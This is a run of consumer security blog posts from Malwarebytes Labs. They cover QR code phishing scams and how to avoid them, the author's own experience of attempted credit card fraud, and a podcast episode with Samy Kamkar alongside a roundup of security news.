Phishing links can just as easily be disguised as QR codes. Phishers place QR codes where it makes sense for the user. So, for example, if someone is expecting to login to start a payment procedure or to get access to a certain service, the scammers may place a QR code there. We’ve also seen phishing mails equipped with fraudulent QR codes.

The email shown above instructed the receiver to install the “security app” from their bank to avoid their account being locked down. However, it pointed to a malicious app outside of the webstore. The user had to allow installs from an unknown source to do this, which should have been a huge red flag, but still some people fell for it.

Lastly, there’s the redirect payments scam, which was used by a website that facilitated Bitcoin payments. While the user entered a Bitcoin address as the receiver, the website generated a QR code for a different Bitcoin address to receive the payment. It’s yet another scam that demonstrates that QR codes are too hard for humans to read.

How to avoid QR code scams

There are a few common sense methods to avoid the worse QR code scams:

• Do not trust emails from unknown senders.
• Do not scan a QR code embedded in an email. Treat them the same as links because, well, that’s what they are.
• Check to see whether a different QR code sticker was pasted over the original and, if so, stay away from it. Or better yet, ask if it’s OK to remove it.
• Use a QR scanner that checks or displays the URL before it follows the link.
• Use a scam blocker or web filter on your device to protect you against known scams.

Even if the mail from a bank looks legitimate, you should at least double-check with the bank (using a contact number you’ve found on a letter or their website) if they ask you to log in on a site other than their own, install software, or pay for something you haven’t ordered.

As an extra precaution, do not use your banking app to scan QR codes if they fall outside of the normal pattern of a payment procedure.

Do I want to know what’s next?

Maybe not, but forewarned is forearmed. One method in development to replace QR codes on Android devices is the Near Field Communication (NFC) tag. NFC tags, like QR codes, do not require an app to read them on more modern devices. Most of the recent iPhones and Androids can read third-party NFC tags without requiring extra software, although older models may need an app to read them.

NFC tags are also impossible to read by humans but they do require an actual presence, i.e. they can’t be sent by mail. But with the rise in popularity of contactless payments, we may see more scams focusing on this type of communication.

Stay safe, everyone!

The post QR code scams are making a comeback appeared first on Malwarebytes Labs.

Sometimes, I think there are three certainties in life: death, taxes, and some form of payment fraud. Security reporter Danny Palmer experienced this a little while ago, and has spent a significant amount of time tracking the journey of his card details from the UK to Suriname. His deep-dive confirmed that it is easy to become tangled up in fraud, even if you’re very careful. I myself have experienced one of the more peculiar forms of credit card theft, detailed below.

Sometimes it’s you…

Right off the bat, let’s clarify that there are ways to both help and hinder the security of your payment information.

Maybe you switched something off while traveling for easy access and forgot to turn it back on at the other end. Perhaps there was some ancient Hotmail account still tied to something important with a password on six hundred thousand password dumps. Maybe you did one of those “Without giving your exact date of birth, please tell us something you’d recognise from your childhood and also your exact date of birth and credit card number” things bouncing around on social media.

These are all ways you can inadvertently generate problems for yourself at a later date.

Sometimes it isn’t you

On the other hand, instead of winding up in one of the above examples, let’s say you successfully navigated all perils.

You secured your desktop, installed some security software, followed the advice to keep your system up to date, and avoided all dubious installs. Locking down your phone was a great idea. Reading some blogs on password managers was the icing on the cake. You’ve done it all, and anything going wrong after this will have to be one heck of a fight.

There is, however, a third path outside of what you do or don’t do to keep data secure.

Occasionally, the issue is elsewhere

Maybe people you don’t know, who you entrusted with the well-being of your card data, did something wrong. Perhaps a Point of Sale terminal is missing vital patches. The store across town didn’t keep an eye on their ATM, and the company responsible for it didn’t have a means to combat the skimmer strapped across the card slot. The clothing store you bought your jacket from did a terrible job of locking down payment data and everything is sitting in the clear.

This is absolutely one of those “whatever will be, will be” moments.

The…good?…news about hacks outside of your control is, they can happen to anyone. Including people who work in security. As a result, you shouldn’t feel like you’ve done something wrong. In many cases, you almost certainly haven’t. It’s way beyond time to normalise the notion that huge servings of guilt aren’t a pre-requisite for data theft.

Setting the scene: My experience with card fraud

When I received my fraud missive through the post, it was shortly after an incredibly time consuming and complicated continent-spanning house move. Did I make a multitude of payments in all directions? You bet. Shipping, storage, local transportation, and a terrifyingly long list of general administrative and paperwork duties from one end of a country to another.

I avoided using my banking debit card throughout the process, relying on my credit card instead. There’s a reason for this.

Interlude: why I used a credit card

If you buy something with your debit card and it ends up with a scammer, you may have problems recovering your funds. You may well have to endure a lengthy dispute process, or prove you weren’t being negligent in order to get your money back.

Increasingly, banks are making this a little harder to do.

If you bank online, you’ll almost certainly have seen a digital caveat any time you go to transfer money. They’re usually along the lines of waiving the ability to reclaim your money back if tricked into sending your cash to a scammer. They’ll ask you to confirm you know who you’re sending the money to or place the responsibility for transferring funds directly on your own shoulders. Perhaps they’ll try and get out of paying up if your PC was compromised by malware. If you pay by cheque, you could get into all sorts of tedious wrangling behind the scenes too.

Even without all of the above, your bank may well have a number of minimum best practices for you to follow. Unless you want to run into potential pitfalls, try and keep things ship-shape there too.

Meanwhile, the credit card is a fast-track to getting your money back, because it’s the incredibly large and powerful credit company getting their money back. You’re just there for the ride, as it were. This in no way removes your requirement to be responsible with your details, but from experience, I’ve had more success righting a cash-related wrong where it involved credit rather than debit. It’s an added form of leverage and protection. The real shame is that isn’t usually the case when paying with your own money. Once again, we’re back in the land of “whatever will be, will be”.

End of interlude: when things go wrong

I don’t know exactly what happened with my card, or who took the details. I’ve no idea if the details were swiped from an insecure database, or a store had Point of Sale malware on a terminal. I can’t say if it was cloned from one of the few times I had to use an ATM.

Stop and think about the places you frequently buy items from. Maybe even draw up a list on a map. You’ll almost certainly have a handful of stores you use regularly, with a few random places thrown in for good measure. Perhaps you avoid ATMs completely, opting for cashback in stores instead. You probably shop online at the same places too, with a few more off-the-beaten-track sites popping up here and there, too.

You may get lucky and discover one of them has had a breach. If they’re small shops or family businesses, sorry…you probably won’t read about it in the news. Website compromises can lay undetected for a long time. Same for Point of Sale malware on physical terminals. Your shopping circle of trust only extends so far and is only useful for figuring out a breach up to a point. After that, it’s guesswork and for various reasons, your bank/credit card company won’t disclose investigation information.

The scammers strike

What I do know, is that a letter came through the door telling me someone had tried to make a purchase of around 14 thousand pounds on my credit card. Their big plan was to order a huge supply of wine from a wine merchant. What I was told by the bank, is that these aren’t places you can typically wander in off the street and throw some wine in a shopping trolley. These are organisations which sell directly to retailers.

Logic suggests that card fraud circles around small, inconspicuous transactions to remain off the grid. Nothing screams small, inconspicuous transactions like “a purchase more than the limit on your card for a bulk supply of rare, expensive wine from a direct to store wine merchant unavailable to the public”.

Though this is outside my realm of experience, my guess is a successful purchase would’ve resulted in the wine being sold on in ways which obscure the source of the original funds. By the time anyone has figured out what happened, the scammer has turned a profit and I’m left holding the incredibly large wine bag.

Luckily for me, “Make small inconspicuous transactions” doesn’t appear to have been in their playbook. Even if the fraud detection team had somehow missed this utterly out of character purchase, the scammers also managed to blow past my credit card limit. I assume the big fraud detection machine exploded and required a bit of a lie down afterwards to recover.

Dealing with the aftermath

I was very lucky, if you can call it that, because of the baffling way the scammers tried to rip me off. If the ludicrous size of the attempted payment hadn’t set alarm bells ringing, the unusual items purchased probably would have given the same end result. Similarly, Danny Palmer’s card flagged the fraud tripwires before any money was taken. Banks and credit card companies are constantly adding new ways to detect dubious antics and also make logging into banking portals a safer experience.

All the same, we shouldn’t rely on others too much to ensure our metaphorical bacon is saved at the last minute. Keep locking things down, be observant when using ATMs, and familiarise yourself with the security procedures for your payment method of choice. We can’t stop everything from going wrong, but we can certainly help tip the odds a little bit more in our favour.

I probably won’t crack open a bottle of wine to celebrate, though.

The post Caught in the payment fraud net: when, not if? appeared first on Malwarebytes Labs.

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Samy Kamkar, chief security officer and co-founder of Open Path, about the digital vulnerabilities in our physical world.

If you look through a recent history of hacking, you’ll find the clear significance of experimentation. In 2015, security researchers hacked a Jeep Cherokee and took over its steering, transmission, and brakes. In 2019, researchers accessed medical scanning equipment to alter X-ray images, inserting fraudulent, visual signs of cancer in a hypothetical patient.

Experimentation in cybersecurity helps us learn about our vulnerabilities.

Today, we’re discussing one such experiment—a garage door opener called “Open Sesame,” developed by Kamkar himself.

Tune in to hear about the “Open Sesame,” how it works, what happened after its research was presented, and how the public should navigate and understand a world rife with potential vulnerabilities on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

• Scammers banking on the KnowBe4 security awareness training brand to get people to hand over their work credentials and other personally identifiable information (PII).
• Sandboxing—what it is, what should we know about it, and why its an essential tool in malware detection and analysis.
• Taurus, a recently developed credential stealer now being spread through malvertising campaigns.

Other cybersecurity news:

• Threat intelligence researchers from Group-IB has outed a new Russian-speaking ransomware gang called OldGremlin, and it has been targeting big companies in Russia. (Source: CyberScoop)
• Tyler Technologies, a product vendor of US states and counties during election seasons, recently admitted that an unknown party has hacked their internal systems. (Source: Reuters)
• Graphika unearthed a campaign they called Operation Naval Gazing, which is aimed at supporting China’s territorial claim in the South China Sea. (Source: TechCrunch)
• As the US elections draw near, the FBI and CISA warn voters against efforts and interference from foreign actors potentially spreading disinformation regarding election results. (Source: The Internet Crime Complaint Center (IC3))
• Activision, the video game publisher for Call of Duty (CoD), denied that it had been hacked after reports that more than 500,000 accounts have had their login information leaked. (Source: Dexerto)

Stay safe, everyone!

The post Lock and Code S1Ep16: Investigating digital vulnerabilities with Samy Kamkar appeared first on Malwarebytes Labs.